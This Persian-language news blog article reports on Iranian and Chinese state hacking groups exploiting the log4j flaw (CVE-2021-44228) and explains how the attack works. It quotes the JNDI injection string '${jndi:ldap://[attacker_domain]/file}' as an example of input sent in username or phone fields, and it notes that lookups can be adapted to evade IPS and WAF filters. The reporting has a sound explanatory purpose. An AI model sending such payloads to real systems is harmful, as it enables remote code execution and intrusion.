close button
آیا می‌خواهید به نسخه سبک ایران‌وایر بروید؟
به نظر می‌رسد برای بارگذاری محتوای این صفحه مشکل دارید. برای رفع آن به نسخه سبک ایران‌وایر بروید.
بلاگ

هکرهای حکومت‌های ایران و چین پیشتاز سوءاستفاده از یک نقص امنیتی

۷ دی ۱۴۰۰
امنیت دیجیتال با احمد باطبی
خواندن در ۶ دقیقه
مرکز اطلاعات تهدیدات مایکروسافت (MSTIC) پیش‌تر نیز از فوسفورس نام برده و گفته بود که دست‌کم از سال ۲۰۱۳ مشغول رصد فعالیت‌های این گروه تحت فرمان جمهوری اسلامی است.
مرکز اطلاعات تهدیدات مایکروسافت (MSTIC) پیش‌تر نیز از فوسفورس نام برده و گفته بود که دست‌کم از سال ۲۰۱۳ مشغول رصد فعالیت‌های این گروه تحت فرمان جمهوری اسلامی است.

احمد باطبی

نقص امنیتی موسوم به «لاگ۴جی» (log4j)، یکی از حادترین آسیب‌پذیری‌های تاریخ فضای مجازی است که میلیون‌ها دستگاه متصل به اینترنت را به خطر انداخته و در این میان، هکرهای وابسته به جمهوری اسلامی و هکرهای مرتبط با دولت چین، بیشترین بهره را از آن می‌برند. 

***
شرکت مایکروسافت، در گزارش‌های خود از گروه هکری موسوم به «فوسفورس» (PHOSPHORUS) به عنوان یکی از گروه‌های هکری پیشتاز در سوءاستفاده از آسیب‌پذیری لاگ۴جی نام برده و گفته است که این گروه، آسیب‌پذیری (log4j) را در راستای اهداف خود خصوصی‌سازی کرده و به اعتقاد متخصصان مایکروسافت، از آن برای اهداف مختلفی، از جمله استقرار باج‌افزار در دستگاه‌های آسیب‌پذیر استفاده می‌کند. 

مرکز اطلاعات تهدیدات مایکروسافت (MSTIC) پیش‌تر نیز از فوسفورس نام برده و گفته بود که دست‌کم از سال ۲۰۱۳ مشغول رصد فعالیت‌های این گروه تحت فرمان جمهوری اسلامی است. به گفته این مرکز، گروه فوسفورس، یکی از  زیرمجموعه​‌های «تهدید پیشرفته مدام » (APT) تحت فرمان رژیم حاکم بر ایران است که جرایم متعددی، از جمله حمله سایبری به مقامات دولت آمریکا، تلاش برای دخالت و اخلال در روند معمول انتخابات ایالات متحده و راه‌اندازی کمپین‌های جاسوسی در شبکه‌های اجتماعی علیه شهروندان، کارکنان شرکت‌ها و فعالان و روزنامه‌نگاران را در کارنامه خود دارد. 

در روزهای اخیر، شرکت امنیت سایبری آمریکایی-اسراییلی «چک‌​پوینت» (CheckPoint) نیز از ناکامی هکرهای ایرانی در حمله به اهداف متعددی در اسراییل خبرداده بود. به گفته چک‌پوینت، هکرهای گروه «بچه گربه‌ ملوس» (Charming Kitten)، از زیرمجموعه​‌های «تهدید پیشرفته مدام ۳۵» (APT 35) تلاش کرده‌اند که با استفاده از ضعف امنیتی (log4j)، به شبکه داخلی هفت سازمان تجاری و دولتی در اسراییل نفوذ کنند. اما این تلاش با دخالت شرکت چک‌​پوینت با شکست مواجه شد.

چک‌​پوینت همچنین در گزارش دیگری از تلاش هکرها برای نصب بدافزار استخراج رمزارز با استفاده از آسیب‌پذیری (log4j) خبر داده و گفته بود که کارشناسان این شرکت در خلال رصد این ضعف امنیتی بدافزاری به نام «Win32 sfrnp» را کشف کردند که کارش «کریپتو ماینینگ» crypto mining یا به بردگی گرفتن سیستم‌عامل‌های ویندوز و استفاده از توان آن‌ها برای استخراج رمزارز است.

به گفته مایکروسافت، علاوه بر گروه ایرانی فوسفورس، یک گروه هکری چینی بنام «هافنیوم» (HAFNIUM) که در خارج از خاک چین فعالیت می‌کنند نیز از آسیب‌پذیری (log4j) برای توسعه فعالیت‌های خود بهره می‌برد.

به گفته بنیاد نرم‌افزار «آپاچی» (Apache)، آسیب‌پذیری لاگ۴جی ابتدا چهارشنبه سوم آذرماه ۱۴۰۰ توسط شرکت «علی‌بابا»، یکی از غول‌های فناوری چینی گزارش شد. اما ثبت رسمی و اعلام عمومی آن با شناسه «CVE-2021-44228» دو هفته بعد، در تاریخ پنج‌شنبه، ۱۸ آذرماه انجام شد.

 این آسیب‌پذیری در واقع یک ضعف امنیتی در نرم‌​افزار «لاگ۴جی» (log4j) است که به سادگی امکان نفوذ و دراختیار گرفتن سیستم‌های کنترل صنعتی، سرورهای میزبان وبسایت‌ها، دستگاه‌های الکترونیک و مصرفی را برای مجرمان اینترنتی فراهم می‌کند. 

«سرجیو کالتاگیرونه»، معاون شرکت «دراگوس» (Dragos) از جمله ابرشرکت‌های امنیت سایبری در جهان، با اشاره به عمق و وسعت خطرهایی که این آسیب‌پذیری برای صنایع حیاتی، از جمله برق، آب، غذا و نوشیدنی، تولید و حمل‌ونقل ایجاد می‌کند، می‌گوید: «من فکر می‌کنم که هیچ یک از فروشنده‌های بزرگ نرم‌افزار در جهان را نخواهیم دید، حداقل در بخش صنعتی که با این مشکل آسیب‌پذیری (log4j) روبرو نشده باشند.» 

«جن ایسترلی»، یکی از مقامات دفاعی امنیت سایبری ایالات متحده نیز روز دوشنبه ۲۹ آذرماه در تماسی با مقامات ایالتی و محلی و شرکای بخش خصوصی در آمریکا، نسبت به ابعداد گسترده آسیب‌پذیری «CVE-2021-44228» هشدار داده و گفته است که این نقص «یکی از جدی‌ترین نقص‌هایی است که در تمام دوران حرفه‌ای خود دیده‌ام، اگر نگوییم جدی‌ترین.»

«اریک گلدشتاین»، رییس بخش امنیت سایبری آژانس امنیت سایبری و امنیت زیرساخت‌های ایالات متحده (CISA) در توصیف شرایط کنونی می‌گوید: «آنچه که ما با آن روبه‌رو هستیم، یک آسیب‌پذیری گسترده و سهل‌الوصول است که به صورت بالقوه، زمینه‌ آسیب دیدن از سوی دشمنان را فراهم می‌کند. اما اصلاح و ترمیم این آسیب‌‌پذیری قدری طول می‌کشد. 

نرم‌​افزار لاگ۴جی (log4j) کتاب‌خانه​‌های «لاگ جاوا» مشهوری است که به دلیل توانایی‌های فراوان آن، بسیار محبوب و پرکاربرد است. این کتابخانه تاکنون بیش از ۴۰۰ هزار بار از مخزن «گیت‌​هاب» (GitHub) دانلود شده و گمان می‌رود در پیکربندی دست‌کم ۱۳میلیارد دستگاه در سراسر جهان استفاده شده باشد. تاجایی که با اطمینان می‌توان گفت، امروزه هر سرویس شناخته‌شده‌ای، از توییتر گرفته تا آمازون و مایکروسافت کاربر این کتابخانه بوده و در نتیجه، در معرض خطر حمله (Remote Code Execution) یا اجرای کد‌های مخرب از راه دور هستند.

آسیب‌پذیری (log4j) با شناسه «CVE-2021-44228» در بسته «لاگ آپاچی۲» (Log4j 2)، نسخه​ «2.14.1» و نسخ قدیمی‌تر وجود دارد که مهاجمان از آن برای اجرای کد‌های مخرب را از راه دور (Remote Code Execution) بر روی دستگاه‌های آسیب‌پذیر و در اختیار گرفتن کنترل آن استفاده می‌کنند. 

برنامه‌های مبتنی بر جاوا برای فراخوان عناصر جاوا از یک ویژگی به نام «JNDI» و نیز پروتکل متن بازی به نام «DAP» استفاده می‌کنند. هکرها ابتدا با موتورهای جست‌وجوگر و یا ابزارهای پیمایش مخصوص این نوع آسیب‌پذیری‌ها، دستگاه‌های که از بسته «لاگ آپاچی۲» (Log4j 2)، نسخه​ «2.14.1» و نسخ قدیمی‌تر استفاده می‌کنند را شناسایی کرده و از طریق یکی از این برنامه‌های مرتبط با ماژول آسیب‌پذیر، رشته‌ای مانند «${ jndi:ldap://[attacker_domain]/file}» را تحت عنوان بخشی از نام کاربری، رمز عبور، شماره تلفن و غیره به آن ارسال می‌کنند. برنامه به شکل خودکار از ویژگی JNDI استفاده کرده و کلاس «[attacker_domain]/file» را با استفاده از پروتکل​ DAP به مهاجم باز می‌گرداند. و به این شکل، زمینه برای اجرای کد‌های مخرب از راه دور، با استفاده از «Log4Shell» فراهم می‌شود. 

جاوا نسخه ۸ و بالاتر محدودیت​‌هایی را برای رشته​‌هایی مانند «${jndi:ldap://...}» ایجاد کرده است اما این محدودیت​‌ها توان ایستادگی در مقابل حمله​‌های پیچیده را ندارند. چرا که این نرم​‌افزار به زبان «اسکریپت» log4j2’s homebrew، موسوم به (lookups) نوشته شده است که در صورت قدری خلاقیت، می‌توان آن را برای دور زدن «IPS» و «WAF» توسعه داد. از سویی دیگر، ساختار این مجموعه ​کدها به شکلی است که نمی‌​توان حتی در صورت انتشار وصله​‌امنیتی، تمام مجموعه را وادار کرد که از ماژول وصله شده استفاده کنند.

مشکل بزرگ‌تر این است حتی در صورت انتشار وصله امنیتی و ترمیم آسیب‌پذیری، درک اینکه دستگاه و یا شبکه‌ها آلوده بوده و یا پاک هستند، امری زمان‌بر، پیچیده و پرخرج است. و این امکان وجود دارد که هکرهای سازمان‌یافته، در زنجیره‌ای از حملات خود به سازمان‌ها و شرکت‌ها، به شبکه داخلی آن‌ها نفوذ کرده و با ایجاد «درب پشتی» (Backdoor) دور از چشم مدیران شبکه حضور خود را تثبیت کرده و بعد‌ها اقدام به حمله و یا سوءاستفاده از اهداف هک شده کنند. از این رو، حتی در صورت عدم شناسایی عملیات نفوذ و یا هک یک شبکه، معاینه فنی و اطمینان از پاکی شبکه امری ضروری است. با توجه به مقیاس جهانی این آسیب‌پذیری می‌توان حدس زد که تنها معاینه فنی شبکه جهت اطمینان از عدم وجود مشکل احتمالی چه هزینه کلانی را بر دوش سازمان‌ها و کسب و کارها خواهد گذاشت. 

 آژانس امنیت سایبری و امنیت زیرساخت‌های ایالات متحده (CISA) روز سه شنبه، ۳۰ آذر صفحه‌ای مخصوص برای پرداختن به آسیب‌پذیری (Apache Log4j) و «CVE-2021-44228» ایجاد کرده و دستور‌العمل‌های لازم‌الاجرایی را تحت عنوان (BOD) 22-01  و (ED) 22-02 برای کاهش آسیب‌های ناشی از این آسیب‌پذیری عالمگیر ارائه کرده است.  

علاوه براین، شرکت‌های بزرگ سایبری نیز پیشنهاد‌ها و راه‌کارهای مختلفی را برای جلوگیری از خطرات احتمالی ارائه کرده‌اند.

مطالب مرتبط:

شکست هکرهای ایرانی برای هک اهداف اسرائیلی

سپاه، چین و روسیه نقش‌های اصلی گزارش مرکز امنیت سایبری کانادا

سرقت‌های میلیونی از شهروندان ایرانی با ارسال پیامک چه‌طور صورت گرفت؟

ثبت نظر

گزارش

دور هشتم مذاکرات احیای برجام؛ آخرین فرصت‌ها کنار درخت کریسمس

۷ دی ۱۴۰۰
فرامرز داور
خواندن در ۴ دقیقه
دور هشتم مذاکرات احیای برجام؛ آخرین فرصت‌ها کنار درخت کریسمس